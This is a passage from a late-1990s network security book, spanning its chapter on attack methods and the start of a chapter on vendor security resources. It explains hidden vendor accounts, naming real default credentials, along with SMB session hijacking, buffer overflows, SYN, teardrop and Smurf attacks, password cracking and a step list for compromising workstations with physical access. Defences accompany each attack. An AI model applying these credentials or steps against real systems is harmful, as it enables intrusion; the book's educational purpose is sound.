understand the output of the reports \nthey were producing. Ask for references before contracting with anyone to \nperform a security audit. \nIt is impossible for a remote vulnerability scanner to identify all exploits without actually launching them against \nthe remote system. For example, you cannot tell whether a remote system is susceptible to a teardrop attack \nwithout actually launching the attack to see if the system survives. This means that you should not assume that a \nsystem has a clean bill of health just because a remote vulnerability scanner does not identify any specific \nproblems. \nIt is possible for a vulnerability scanner to identify exploits without having to launch them when the software is \nrunning on the system that you wish to check or when it has full access to the file system. A software program \nrunning locally has the benefit of being able to check application and driver dates and compare these to a list of \nknown fixes. For example, a vulnerability scanner running on an NT server that you wish to check would be able \nto verify that the tcpip.sys is dated 1/9/98 or later. This would indicate a patched driver, which is not susceptible to \nany known Teardrop attacks. \nVulnerability scanners are simply a tool; they are not a magic bullet for finding all known security problems. \nWhile vulnerability scanners are fine for providing some initial direction about which system may be in the most \nneed of attention, they should not be considered a final authority on which systems are secure and which ones are \nnot. There is no tool that can replace an experienced administrator who stays informed of security issues and has \nan intimate understanding of the systems he manages. \n \n \n \n" }, { "page_number": 346, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 346\nLaunching the Attack \nOnce Woolly Attacker knows your weak spots, he is ready to launch an attack. The type of attack he launches will \ngreatly depend on his final objectives. Is he after one specific resource, or does he want to go after all systems on \nthe network? Does he wish to penetrate a system or will a denial of service suffice? The answers to these questions \nwill decide his next course of action. \nIn this section, we will look at a number of different exploits. The intent is not to give a listing of all known \nexploits—any such list would be out of date before this book even went to print. Rather, the goal is to show you a \nselective sampling of the exploits found in the wild so that you can better understand what can and cannot be done \nwhen attacking a target system or network. The idea is to make you aware of the types of attacks that can be \nlaunched—so that you will be better able to determine whether a particular resource is safe. \nNote \nSome exploits that were briefly described earlier in this book have been included here for \ncompleteness. \nHidden Accounts \nWhile not an exploit per se, hidden user accounts can completely circumvent a security policy. For example, let’s \nsay you have a border router that is protecting your network by providing packet filtering. Imagine the security \nbreach of having that device contain a hidden, administrator-level account that has a password that cannot be \nchanged. Far-fetched, you say? Try telling that to 3COM. \nIn the spring of 1998, it came to light that 3COM was configuring layer-2 and -3 switches within its CoreBuilder \nand SuperStack II product line with hidden administrator accounts. The authentication pair used for most of these \ndevices was a logon name of debug with a password of synnet. This administrator-level account could not be \nchanged or deleted and was not visible from the management software. This meant that you could take all the right \nsteps to secure your network hardware—only to have an attacker come in through the back door. \nIn 3COM’s defense, it was not the first vendor nor will it probably be the last to hide accounts within its firmware. \nA number of other hardware vendors have done the same, citing support issues as the primary motivating force. \nThese firms reason that, by including a hidden administrator account, a technical-support person would be able to \nhelp a user who has forgotten the administrator password on the visible account. Many vendors, such as Cisco, \nhave taken a more secure approach to handling such problems. For example, if you forget the password to your \nCisco router, it can still be recovered, but you need physical access to the device and you must take it offline \nduring the recovery process. This provides a far more secure method of password recovery. \nTip \nUnless a vendor has made a statement to the contrary, it is impossible to know which \nnetwork devices have hidden administrator accounts. This means that you should not rely \nsolely on password authentication; rather, you should take additional measures in order to \nsecure these devices. For example, you may wish to consider disabling remote management \nof the device altogether or limiting management access to only certain IP addresses. \nMan in the Middle \nThe classic man-in-the-middle exploit is to have an attacker sitting between the client and the server with a packet \nanalyzer. This is the variation that most people think of when they hear the term “man in the middle.” There are, in \nfact, many other forms of man-in-the-middle attacks, which exploit the fact that most network communications do \nnot use a strong form of authentication. Unless both ends of the session frequently verify whom they are talking to, \nthey may very well be communicating with an attacker, not the intended system. \nStepping in on a conversation is typically referred to as session hijacking. An attacker waits for two systems to \nbegin a legitimate communication session and then injects commands into this data stream, pretending to be one of \nthe communicating systems. Session hijacking tools have been available for NetWare for some time. There are \ntools that allow any user to hijack the supervisor’s communication session and promote his or her own logon ID to \na supervisor equivalent. In the summer of 1997, a similar tool was released for Windows NT environments, called \nC2MYAZZ. \nC2MYAZZ \nThe C2MYAZZ utility is an excellent example of using spoofing in order to hijack a communication session. \nWhen Windows 95 and NT were originally introduced, they included two methods of authenticating with a \nSession Message Block (SMB) system. The default was to authenticate using an encrypted password. This was the \npreferred method for authenticating with a Windows NT domain. LanMan authentication was also included, \nhowever, for backwards compatibility with SMB LanMan servers. LanMan authentication requires that the logon \nname and password be sent in the clear. \n" }, { "page_number": 347, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 347\nWhen C2MYAZZ is run, it passively waits for a client to authenticate to the NT server. When a logon is detected, \nC2MYAZZ transmits a single packet back to the client, requesting that LanMan authentication be used instead. \nThe client, trusting that the server is sending the request, happily obliges and retransmits the credentials in the \nclear. The C2MYAZZ utility would then capture and display the logon name and password combination. \nC2MYAZZ causes no disruption in the client’s session, because the user can still log on and gain system access. \nA packet capture of C2MYAZZ in action is shown in Figure 16.11. A client establishes a connection with an NT \ndomain controller named FirstFoo by initializing a TCP three-packet handshake. In packet 6, the client informs the \nserver that it wishes to authenticate to the domain. Packet 7 is where things start to get interesting. Notice that \nC2MYAZZ has transmitted a packet back to the client. The source IP address used by C2MYAZZ (192.168.1.1) is \nthat of the server FirstFoo. All acknowledgment and sequence numbers are spoofed, as well, so that the client \nassumes that it has received this packet from the server FirstFoo. The bottom window is the data being transmitted \nby C2MYAZZ that tells the client to use clear text authentication. \nIn packet 8, the domain controller FirstFoo responds, telling the client that encryption is supported—but at this \npoint it is too late. The client has already received the spoofed packet from C2MYAZZ, so the client assumes that \nthe real transmission from FirstFoo must be a duplicate and discards the information. The client then proceeds to \nuse clear text authentication. The C2MYAZZ utility is then free to document the logon name and password, as \nboth have been transmitted in the clear. \n \nFigure 16.11: A packet capture of C2MYAZZ telling a client to use clear text passwords \nNote \nWhat is interesting about this exploit is that if both the server and the client are unpatched, \nthere is no interruption in connectivity. The client authenticates to the server and receives \naccess to network resources. Microsoft has made two patches available for this exploit: \none of the patches gets loaded on all clients and the other gets loaded on the server. If you \nload the client patch, the client will refuse to send logon information in the clear. If the \nserver patch is loaded, the server will not accept clear text logons. The client may still \ntransmit clear text authentication information, but the server will not accept clear text \ncredentials. This means that unless you patch every single system, C2MYAZZ now \nbecomes an effective tool for causing a denial of service because clients will no longer be \nable to authenticate with the domain. \nThe reason that C2MYAZZ is so effective is that neither the client nor the server makes any effort to authenticate \nthe remote system. Since the client accepts the spoofed packet as legitimate, C2MYAZZ is free to hijack the \nsession. The Microsoft response to this problem—which is to stop using clear text authentication information—is \nsimply a patch, not a true fix. Since this patch does not include authentication, the SMB session is still vulnerable \nto hijacking attacks. As mentioned, this attack is a variation of an old NetWare attack that allowed users to hijack \na supervisor’s session and promote themselves to a supervisor equivalent. This is what prompted Novell to create \npacket signature. \nPacket signature is an authentication process that allows the NetWare server and client to validate each other’s \nidentity during the course of a communication session. When the server receives a packet of data from the client, \nthe signature information is referenced in order to insure that the transmission source is legitimate. The problem \nwith packet signature is that, by default, clients and servers are configured not to use it unless signing is requested \nby the other system. This means that packet signature as a method of authentication is not used by default. Even if \na client setting is changed so that it requests packet signature, it is far too easy to use a utility similar to \nC2MYAZZ, which would inform the client that packet signature is not supported. \nTip \nThe only way to insure that packet signature is used is to set packet signing to the highest \nsetting. This prevents the client from talking to any server that does not support packet \nsignature. \n" }, { "page_number": 348, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 348\nBuffer Overflows \nWhen a programmer writes an application, she must create memory pools, referred to as buffers, in order to accept \ninput from users or other applications. For example, a login application must allocate memory space in order to \nallow the user to input a logon name and password. In order to allocate enough memory space for this information, \nthe programmer must make an assumption about how much data will be received for each variable. For example, \nthe programmer may decide that users will not need to enter a logon name larger than 16 characters and that \npasswords will never be larger than 10 characters. A buffer overflow is when more data is received by a process \nthan the programmer ever expected the process to see, and no contingency exists for when the process has to deal \nwith an excessive amount of data. \nAn Example of a Buffer Overflow \nFor an example of how buffer overflows are used as exploits, let’s return to our example in Figure 16.8, where we \nhad established a session with an Exchange server using telnet. If we take a quick trip to www.rootshell.com \nand do a search for known vulnerabilities of Exchange, we find that this version of Exchange is susceptible to a \nbuffer overflow attack. \nFor example, if you use an LDAP bind request (consisting of a username, password, and binding method) and pad \nthe bind method with more than 256 characters, the LDAP service will crash, and a hacker could execute code. \nThis is because when the LDAP connector was coded, the programmers assumed that allocating enough memory \nspace to handle a binding method containing 254 characters was more than sufficient. While it seems safe to \nassume that a binding method that is greater than 254 characters would ever exist, the problem is that the \nprogrammers never told the application what to do if it ever did actually receive a 255-character binding method. \nInstead of truncating the data or outright rejecting it, the LDAP connector will still attempt to copy this long \naddress into a memory space that can only handle 254 characters. The result is that the characters after character \nnumber 254 will overwrite other memory areas or get passed off to the core OS for processing. If you are lucky, \nthis causes the server to crash. If you are not so lucky, the remaining characters can be interpreted as instructions \nfor the operating system and will be executed with the level of permissions granted to that service. This is why \nrunning services as root or administrator is considered so dangerous. If Woolly Attacker can cause a buffer \noverflow, he may be able to execute any command he wants on the target system. \nOther Buffer Overflow Attacks \nBuffer overflows have become the most popular way to cause a denial of service or to attempt to execute \ncommands on a remote system. There are many exploits that rely on sending a process too much information in \norder to attack the target system. Some of the more popular buffer overflow attacks over the last few years have \nbeen \nƒ \nSending oversized ICMP request packets (Ping of death) \nƒ \nSending an IIS 3.0 server a 4,048-byte URL request \nƒ \nSending e-mail messages with 256-character filename attachments to Netscape and \nMicrosoft mail clients \nƒ \nSending an SMB logon request to an NT server with the data size incorrectly identified \nƒ \nSending a Pine user an e-mail with a from address in excess of 256 characters \nƒ \nConnecting to WinGate’s POP3 port and entering a username with 256 characters \nAs you can see, buffer overflow problems exist over a wide range of applications and affect every operating \nsystem. The only way to know for sure if an application is susceptible to buffer overflows is to review the source \ncode. \nNote \nYou may be able to find a buffer overflow problem through trial and error, but failing to \nproduce a buffer overflow does not mean that the software is secure. You simply might \nnot have tried enough characters. The only surefire method of verifying that a program is \nnot susceptible to buffer overflows is to review the original source code. \nSYN Attack \nA SYN attack exploits the use of a small buffer space during the TCP three-packet handshake in order to prevent a \nserver from accepting inbound TCP connections. When the server receives the first SYN=1 packet, it stores this \nconnection request in a small “in-process” queue. Since sessions tend to be established rather quickly, this queue is \nsmall and only able to store a relatively low number of connection requests. This was done for memory \n" }, { "page_number": 349, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 349\noptimization, in the belief that the session would be moved to the larger queue rather quickly, thus making room \nfor more connection requests. \nA SYN attack floods this smaller queue with connection requests. When the destination system issues a reply, the \nattacking system does not respond. This leaves the connection request in the smaller queue until the timer expires \nand the entry is purged. By filling up this queue with bogus connection requests, the attacking system can prevent \nthe system from accepting legitimate connection requests. Thus a SYN attack is considered a denial of service. \nSince the use of two memory spaces is a standard TCP function, there is no way to actually fix this problem. Your \ntwo options are \nƒ \nTo increase the size of the in-process queue \nƒ \nTo decrease the amount of time before stale entries are purged from the in-process queue \nIncreasing the queue size provides additional space so that additional connection requests can be queued, but you \nwould need an extremely large buffer to insure that systems connected to a 100Mb or 1Gb network would not be \nvulnerable to a SYN attack. For systems connected to slower network connections, this use of memory would be a \ncomplete waste. As for decreasing the time before connection requests are purged, a timer value that is set too low \nwould prevent busy systems or systems connected by a slow network link to be refused a connection. \nTuning a system so that it cannot fall prey to a SYN attack becomes a balancing act. You want to increase the in-\nprocess queue in order to handle a reasonable number of concurrent connection requests without making the buffer \nso large that you are wasting memory. You also want a purge time that is low enough to remove stale entries but \nnot so low that you start preventing legitimate systems from establishing a connection. Unfortunately, most \noperating systems do not allow you to tune these values. You must rely on the operating system vendor to pick \nappropriate settings. \nTeardrop Attacks \nIn order to understand how a teardrop attack is used against a system, you must first understand the purpose of the \nfragmentation offset field and the length field within the IP header. The fragmentation offset field is typically used \nby routers. If a router receives a packet that is too large for the next segment, the router will need to fragment the \ndata before passing it along. The fragmentation offset field is used along with the length field so that the receiving \nsystem can reassemble the datagram in the correct order. When a fragmentation offset value of 0 is received, the \nreceiving system assumes either that this is the first packet of fragmented information or that fragmentation has \nnot been used. \nIf fragmentation has occurred, the receiving system will use the offset to determine where the data within each \npacket should be placed when rebuilding the datagram. For an analogy, think of a child’s set of numbered building \nblocks. As long as the child follows the numbering plan and puts the blocks together in the right order, he can \nbuild a house, a car, or even a plane. In fact, he does not even need to know what he is trying to build. He simply \nhas to assemble the blocks in the specified order. \nThe IP fragmentation offset works in much the same manner. The offset tells the receiving system how far away \nfrom the front of the datagram the included payload should be placed. If all goes well, this schema allows the \ndatagram to be reassembled in the correct order. The length field is used as a verification check to insure that there \nis no overlap and that data has not been corrupted in transit. For example, if you place fragments 1 and 3 within \nthe datagram and then try to place fragment 2, but you find that fragment 2 is too large and will overwrite some of \nfragment 3, you know you have a problem. \nAt this point, the system will try to realign the datagrams to see if it can make them fit. If it cannot, the receiving \nsystem will send out a request that the data be resent. Most IP stacks are capable of dealing with overlaps or \npayloads that are too large for their segment. \nLaunching a Teardrop Attack \nA teardrop attack starts by sending a normal packet of data with a normal-size payload and a fragmentation offset \nof 0. From the initial packet of data, a teardrop attack is indistinguishable from a normal data transfer. Subsequent \npackets, however, have modified fragmentation offset and length fields. This ensuing traffic is responsible for \ncrashing the target system. \nWhen the second packet of data is received, the fragmentation offset is consulted to see where within the datagram \nthis information should be placed. In a teardrop attack, the offset on the second packet claims that this information \nshould be placed somewhere within the first fragment. When the payload field is checked, the receiving system \n" }, { "page_number": 350, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 350\nfinds that this data is not even large enough to extend past the end of the first fragment. In other words, this second \nfragment does not overlap the first fragment; it is actually fully contained inside of it. Since this was not an error \ncondition that anyone expected, there is no routine to handle it and this information causes a buffer overflow—\ncrashing the receiving system. For some operating systems, only one malformed packet is required. Others will not \ncrash unless multiple malformed packets are received. \nSmurf \nNamed after the original program that would launch this attack, Smurf uses a combination of IP spoofing and \nICMP replies in order to saturate a host with traffic, causing a denial of service. The attack goes like this: Woolly \nAttacker sends a spoofed Ping packet (echo request) to the broadcast address of a network with a large number of \nhosts and a high-bandwidth Internet connection. This network is known as the bounce site. The spoofed Ping \npacket has a source address of the system Woolly wishes to attack. \nThe premise of the attack is that when a router receives a packet sent to an IP broadcast address (such as \n206.121.73.255), it recognizes this as a network broadcast and will map the address to an Ethernet broadcast \naddress of FF:FF:FF: FF:FF:FF. So when our router receives this packet from the Internet, it will broadcast it to all \nhosts on the local segment. \nI’m sure you can see what happens next. All the hosts on that segment respond with an echo-reply to the spoofed \nIP address. If this is a large Ethernet segment, there may be 500 or more hosts responding to each echo request \nthey receive. \nSince most systems try to handle ICMP traffic as quickly as possible, the target system whose address Woolly \nAttacker spoofed quickly becomes saturated with echo replies. This can easily prevent the system from being able \nto handle any other traffic, thus causing a denial of service. \nThis not only affects the target system, but the organization’s Internet link, as well. If the bounce site has a T3 link \n(45Mbps) but the target system’s organization is hooked up to a leased line (56Kbps), all communication to and \nfrom the organization will grind to a halt. \nSo how can you prevent this type of attack? You can take steps at the source site, bounce site, and target site to \nhelp limit the effects of a Smurf attack. \nBlocking Smurf at the Source \nSmurf relies on the attacker’s ability to transmit an echo request with a spoofed source address. You can stop this \nattack at its source by using router access lists, which insure that all traffic originating from your network does in \nfact have a proper source address. This prevents the spoofed packet from ever making it to the bounce site. \nBlocking Smurf at the Bounce Site \nIn order to block Smurf at the bounce site, you have two options. The first is to simply block all inbound echo \nrequests. This will prevent these packets from ever reaching your network. \nIf blocking all inbound echo requests is not an option, then you need to stop your routers from mapping traffic \ndestined for the network broadcast address to the LAN broadcast address. By preventing this mapping, your \nsystems will no longer receive these echo requests. \nTo prevent a Cisco router from mapping network broadcasts to LAN broadcasts, enter configuration mode for the \nLAN interface and enter the command \nno ip directed-broadcast \nNote \nThis must be performed on every LAN interface on every router. This command will not \nbe effective if it is performed only on your perimeter router. \nBlocking Smurf at the Target Site \nUnless your ISP is willing to help you out, there is little you can do to prevent the effects of Smurf on your WAN \nlink. While you can block this traffic at the network perimeter, this is too late to prevent the attack from eating up \nall of your WAN bandwidth. \nYou can, however, minimize the effects of Smurf by at least blocking it at the perimeter. By using dynamic packet \nfiltering or some form of firewall that can maintain state, you can prevent these packets from entering your \nnetwork. Since your state table would be aware that the attack session did not originate on the local network (it \n" }, { "page_number": 351, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 351\nwould not have a table entry showing the original echo request), this attack would be handled like any other spoof \nattack and promptly dropped. \nBrute Force Attacks \nA brute force attack is simply an attempt to try all possible values when attempting to authenticate with a system \nor crack the crypto key used to create ciphertext. For example, an attacker may attempt to log on to your server as \nadministrator using a list of dictionary words as possible passwords. There is no finesse involved; the attacker is \nsimply going to try every potential word or phase to come up with a possible password. \nOne of the most popular ways to perform a brute force attack is with a password cracker, and no program displays \nhow effective these programs can be like Security Software Technologies’ L0phtCrack (developed by L0pht, \nwhich later became @stake). L0phtCrack uses both a dictionary file and a brute force guessing attack in order to \ndiscover user passwords. Figure 16.12 is a screen capture of L0phtCrack attempting to crack a number of user \npasswords. This particular session has just been started. Notice that several passwords have already been cracked. \n \nFigure 16.12: L0pht’s L0phtCrack utility \nEncrypted NT passwords are saved in the \\WinNT\\system32\\config directory in a file named SAM. L0phtCrack \nprovides three ways to access this information: \nƒ \nBy directly importing them into L0phtCrack if the software is running on the NT server \nƒ \nBy reading a backup version of the SAM file saved to tape, an emergency recovery disk, or \nthe \\WinNT\\repair directory \nƒ \nBy sniffing them off the network using the included readsmb.exe utility \nOnce the authentication information has been collected, it is imported into the L0phtCrack utility. Unlike some \npassword crackers that attempt to crack the entire ciphertext, L0phtCrack takes a few shortcuts in order to reduce \nthe time required to crack passwords. For example, if you look at Figure 16.12, the <8 column indicates accounts \nwith a password of fewer than eight characters. This is determined by looking at the ciphertext in the LanMan \nhash. Any password that contains fewer than eight characters will always have the string AAD3B435B51404EE \nappended to the end for padding. This allows L0phtCrack to quickly determine that the password string contains \nfewer than eight characters. \nThe passwords are first checked against a dictionary file with thousands of words. This dictionary file can be \nedited with any text editor if the user wishes to add more words. Dictionary checking is extremely fast—checking \nthe accounts shown in Figure 16.12 took less than 10 seconds. Any passwords that are not cracked by the \ndictionary search are then subjected to a brute force attack, which is capable of testing both alphanumeric and \nspecial characters. The amount of time it takes to brute force the password depends on the number of characters in \nthe password. For example, the account cbrenton in Figure 16.12 has a 10-character password. Had this password \nbeen seven characters or less, the search time would have been reduced by roughly one-third. \nAs system administrator, you simply cannot control the use of password crackers: password crackers are available \nfor every platform. While you may be able to prevent an attacker from running a password cracker directly on \nyour server, she can always run the cracking software on some other machine. This means your only true defense \nis to protect any files that include password information, as well as prevent sniffing on your network through the \nuse of routers and switches. \nPhysical Access Attacks \nWith all the attention given to network-based attacks, many people forget that the most straightforward way to \ncompromise a network is by gaining physical access to one or more network systems. Systems that are kept in \nsecluded or locked areas are the most vulnerable, as this provides the attacker with the necessary privacy to \ncompromise a system. As I have emphasized, an overwhelming majority of attacks originate from within an \norganization. This provides an attacker with a certain level of legitimate access to network resources. With \nphysical access to a system, it is not very difficult to increase this access to that of an administrator. \nFor example, let’s assume that you have an NT workstation environment for all of your client systems. Profiles are \nmandatory and users are provided with minimal access to both the local system and network resources. All service \n" }, { "page_number": 352, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 352\npacks have been installed, as have all security hotfixes. Every NT workstation has full auditing enabled so that \nevery event is recorded and sent off to a remote process that looks for suspicious activity and archives the logs for \nfuture review. \nThis certainly sounds like a secure client environment, doesn’t it? If Woolly Attacker has private physical access \nto the machine, he can easily perform the following steps: \nƒ \nPop the cover on the computer and disconnect the battery in order to clear the CMOS \npassword. \nƒ \nBoot the system off a floppy in order to gain access to the local file system. \nƒ \nCopy the SAM file so that password information can be run through a password cracker. \nƒ \nRemove the local administrator password so that he has full access to the local NT \noperating system. \nƒ \nReboot the system with the NIC disconnected so that he can log on locally as administrator \nwithout tripping any alarms. \nƒ \nChange the logging level so that suspicious activity is not reported. \nƒ \nInstall sniffing software so that other network communications can be monitored. \nƒ \nUse the compromised passwords in order to attack other network systems. \nIn short, a savvy attacker can completely circumvent the security of this environment in less than half an hour. The \ngreatest delays would be in waiting for NT to boot or shut down. If you are managing security for a large \nenvironment, you should not plan on being able to fully secure any of your client systems. As you can see from \nthis scenario, they are far too easy to compromise. \nNote \nThe exception would be a thin client environment such as WinFrame or MetaFrame. This \nis because the local workstations are little more than terminals; all security is managed on \nthe server itself. \n \nSummary \nIn this chapter we discussed some of the ways an attacker might go about attacking your \nnetwork. We started by looking at the ways an attacker can collect information about your \nnetwork with little more than your organization’s name. We then discussed how an attacker \ncould go about collecting even more information about your specific network environment in \norder to determine what vulnerabilities may be exploitable. Finally, we looked at some of the \nassault methods available to an attacker who wishes to compromise your resources. \nIn the next chapter, we will discuss how to stay ahead of these attacks. We will look at how to \nstay informed of the exploits that have been found—and how to find your vulnerabilities before \nan attacker does. \n \nChapter 17: Staying Ahead of Attacks \nThanks to the complexities of modern software, it is safe to say that security vulnerabilities will be with us for \nmany years to come. While public discussion of those vulnerabilities goes a long way toward insuring that current \nsoftware is purged of exploitable code, this makes no guarantee that future releases will be free from the same \nproblems. For example, buffer overflows have plagued programmers since the early ’70s and are still very much a \nproblem today. \nIn order to maintain a secure environment, you need to stay abreast of these exploits as they are discovered. Gone \nare the days when you could wait for a product upgrade or a service pack in order to fix a security problem. For \nexample, Microsoft releases security-related hotfixes constantly. Clearly, you would not want to leave security \nholes simply because you were waiting for a patch from a vendor. \n" }, { "page_number": 353, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 353\nInformation from the Vendor \nVendor channels are your best bet for finding the latest security patches. While most vendors will also issue \nsecurity advisories, you can usually find out about specific exploits much sooner through third-party sources. You \nare also far more likely to get an accurate description of the exploit that is free from marketing spin. For example, \na Microsoft press release regarding Back Orifice (a famous Trojan horse) stated: \n“Back Orifice” does not expose or exploit any security issue in Windows, Windows NT, or the \nMicrosoft BackOffice suite of products. As far as demonstrating an inherent security vulnerability \nin the Windows platform, this is simply not true. \nObviously, this is a great public relations spin, but it is not very helpful to the system administrator who is trying \nto determine how much of a threat this vulnerability poses to her local networking environment. So, while the \nvendor may be willing to tell you that the vulnerability exists, you might have to look elsewhere for the full scoop. \n3COM \n3COM makes a wide variety of networking products, including network cards, switches, and routers. The \ncompany also has a popular handheld computer line called the Palm. 3COM has made a name for itself by \nsupplying reasonably priced products that provide above-average performance. The 3COM Web site can be found \nat www.3com.com. \nTechnical Information \nThe 3COM Web site contains a wealth of technical papers and briefs. While the inventory is not quite as extensive \nas the one maintained by Cisco, the 3COM site has papers on topics ranging from ATM to network management \nto security. Some of these papers are product specific; for example, one of the security papers specifically deals \nwith using a 3COM NetBuilder as a firewall. There are many papers, however, that simply deal with a specific \ntechnology. These papers can be found through the link \nwww.3com.com/technology/tech_net/white_papers/index.html. \nYou can also find a decent amount of product support on 3COM’s Web site. There is no knowledge base, but there \nare support tips and release notes for each of its products. Product documentation is also available online. \nNote \nIn order to get access to 3COM’s knowledge base, you must purchase a support contract. \nThis gives you access to a wider range of problems, such as known bugs. \nThe generic support can be found at http://infodeli.3com.com/index.htm. \n3COM has made improvements in the past few years in issuing security advisories for their products. This is in \nsharp contrast to previous years. Unfortunately, 3COM does not have a mailing list dedicated to security issues, \nsomething other vendors have implemented to improve timely notification of product vulnerabilities. \nPatches and Updates \n3COM makes patches and updates available free to all its customers. You do not need a service contract simply to \nreceive patch updates. This is extremely useful; you are not required to purchase a service contract simply to fix \nknown bugs. There is also some helpful third-party software on 3COM’s support site, such as a Windows-based \nTFTP server. A TFTP server is required if you wish to update the firmware on a 3COM router or switch. You can \naccess 3COM patch files through this link to their software library: \nhttp://support.3com.com/infodeli/swlib/index.htm. \nCisco \nCisco specializes in infrastructure hardware. It has a diverse product line, which includes switches, routers, \nfirewalls, and even intrusion detection systems. Seeing as most of the Internet runs on Cisco hardware, Cisco is \nobviously a major player in the network connectivity field. You can find the Cisco Web site at \nwww.cisco.com. \nTechnical Information \nCisco provides one of the best sites on the Internet if you are looking for network-related advice. Along with \nproduct-specific documentation, there is a wealth of technology information. Looking to implement BGP or OSPF \nin your environment? The Cisco site contains a number of white papers, as well as tutorials that explain the \ntechnology and how to implement it. \n" }, { "page_number": 354, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 354\nThe Cisco Web site has a large number of security-related documents geared toward helping the network \nadministrator lock down his environment. You can literally perform a search on just about any vulnerability (such \nas teardrop, Smurf, and so on) to receive information that describes the exploit and what you can do to protect \nyour internal systems. To make life even easier, all documents can be retrieved directly from the search engine on \nthe main page. \nCisco does an excellent job of publicizing vulnerabilities once these are discovered and resolved. Cisco announces \nthese patches through CERT, as well as through its own distribution channels. As a major Internet player, Cisco \nhas set the standard for commercial vendors in acknowledging vulnerabilities when they are found and issuing \npatches in a timely manner. \nPatches and Updates \nIf Cisco falls short in any area, it would have to be in making new patches publicly available. Cisco does not issue \nhotfixes in order to patch its routers or switches. Rather, the company releases a new revision of the device’s \noperating system. Because these updates may include product enhancements, as well, Cisco does not make them \navailable via publicly accessible areas such as its Web or FTP sites. You need to have a Cisco support contract to \nreceive these updates. \nTo its credit, Cisco will provide free updates when a major security hole is found. For example, when it was found \nthat the Cisco 700 series routers were vulnerable to a buffer overflow attack if a user entered an extremely long \npassword string, Cisco made updates freely available to all Cisco 700 series customers, regardless of whether or \nnot the customer had a support contract. \nLinux \nWhile the core Linux operating system is not considered a commercial product, it is actively produced and \nsupported by a large number of volunteers, as well as the different organizations that distribute it. Linux has \nestablished itself as a robust operating system that is capable of handling mission-critical operations. It can act as \nan application server, a router, or even a firewall. Most Linux-related information is linked to the main Web site at \nwww.linux.org. \nTechnical Information \nThe Linux Web site is host to a plethora of documents created by the Linux Documentation Project (LDP). There \nare FAQs, HOWTOs, and mini-HOWTOs on literally every function or service supported by Linux. No matter \nwhat you are trying to do with your Linux operating system, chances are there is documentation to walk you \nthrough the process. These documents even include many of the caveats you need to watch out for while \nperforming your installation. Links to documentation can be found at www.linux.org/docs/index.html. \nThis page even includes links to many Linux-related mailing lists and newsgroups. The list is literally too \nextensive to include in this chapter. Mailing lists provide an excellent way to get real-time help when a Linux \nproblem has you completely stumped. If phone support is more to your liking, a number of vendors will provide \nthis service for a fee. A list of vendors can be found at www.linux.org/vendors/index.html. \nThe Linux development team actively propagates security-related vulnerabilities and patch information as these \nare discovered. This information is circulated through CERT and through a number of Linux discussion channels. \nThe team is also extremely responsive in issuing patches. \nPatches and Updates \nAs a noncommercial operating system, Linux can be received free of charge. This is also true for security-related \npatches and fixes. There are a number of locations where Linux source code can be downloaded. Some of the \nmore popular include \nƒ \nftp://ftp.cc.gatech.edu/pub/linux/ \nƒ \nftp://sunsite.unc.edu \nƒ \nftp://ftp.caldera.com/pub/ \nƒ \nftp://ftp.redhat.com/redhat \nMicrosoft \nMicrosoft has come under heavy fire over the last few years for the large number of security vulnerabilities found \nin its software products. While Microsoft was initially somewhat unresponsive when security exploits were \nidentified, the company has picked up the pace recently. It is not uncommon for Microsoft to release a security \npatch within hours of the vulnerability’s being reported. You will find the Microsoft Web site at \nwww.microsoft.com. \n" }, { "page_number": 355, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 355\nTechnical Information \nWhile Microsoft’s Web site contains an acceptable amount of technical information, most of it is labeled \n“premium content.” While there is no charge for accessing premium content, you are forced to fill out a marketing \nquestionnaire and configure your browser to accept cookies. The questionnaire requires the typical information: \nwho you are, where you work, and what your e-mail address is. You are also prompted to accept future e-mails \nfrom Microsoft, which contain marketing and promotional information. \nThe requirement that your browser must accept cookies is probably the biggest problem. A cookie is a text file, \nwhich is saved to your local system, that allows a Web site to identify who you are and where you have been. \nPredominantly, this is used by companies like Double-Click.net in order to determine which banner ads have \nproved to be most effective against you in the past. What is really frightening is that cookies can be used to track \nyour movements throughout the Internet and document which Web sites you have visited. You can read the first \ncookie specification at www.netscape.com/newsref/std/cookie_spec.html. \nIf you do not have your browser configured to accept cookies, you will be faced with the error screen shown in \nFigure 17.1. Notice that Microsoft also uses this opportunity to try to get you to use its own browser. \nMicrosoft does post security-related bulletins to its Web site. These alerts can be found at \nwww.microsoft.com/security/. \n \nFigure 17.1: You must accept cookies before viewing technical documents. \nPatches and Updates \nMicrosoft makes all security fixes freely available via its Web site. Microsoft has also made their updates known \nthrough the Critical Update Notification program. This utility runs in the background on Windows systems and \nperiodically connects to Microsoft’s network to determine if there is any recently released patches. The user is \nnotified and given the opportunity to download any fixes as soon as they are released. As mentioned earlier in this \nsection, Microsoft has become extremely responsive in issuing security-related patches. These patches can be \nretrieved from the FTP site ftp://ftp.microsoft.com. \nNovell \nNovell makes a wide range of networking products that are focused on its NetWare operating system. Novell has a \npretty good track record with regard to security. Novell’s Web site is located at www.novell.com. \nTechnical Information \nThe Novell Web site contains a number of white papers; however, all are specific to Novell product offerings. \nThere is very little general information if you are looking to find out about a specific technology. Novell offers a \ndocumentation site that contains online manuals for its product offerings. The documentation site is located at \nwww.novell.com/documentation. \nNovell also maintains a knowledge base that you can search in order to find resolutions to known problems. The \nknowledge base is extensive and documents support calls handled by Novell’s technical support staff. Here you \ncan find answers to just about any Novell-related issue. The problem is that the search engine does not do a very \ngood job of helping you locate documents. For example, entering the phrase security AND alert brings up \nproduct information on WordPerfect, NetWare Connect, and NetView as the closest matches. These documents \nare not exactly what you may be looking for if you are searching to find out about any recent vulnerabilities. You \ncan find the Novell support site at http://support.novell.com. \nNote \nNovell does not participate in CERT advisories and does not dedicate space on its Web \nsite to announcing security-related problems. You may be able to find security issues \nwithin the knowledge base, but you must already know what you are looking for in order \nto find it. This means that you must rely completely on third-party channels for \nvulnerability information regarding NetWare products. \n" }, { "page_number": 356, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 356\nPatches and Updates \nNovell makes all patch updates freely available through its support Web site. There is even a file find utility that \nallows you to see if there is patch update available for a specific file. You can also view Novell’s suggested \nminimum patches and download them 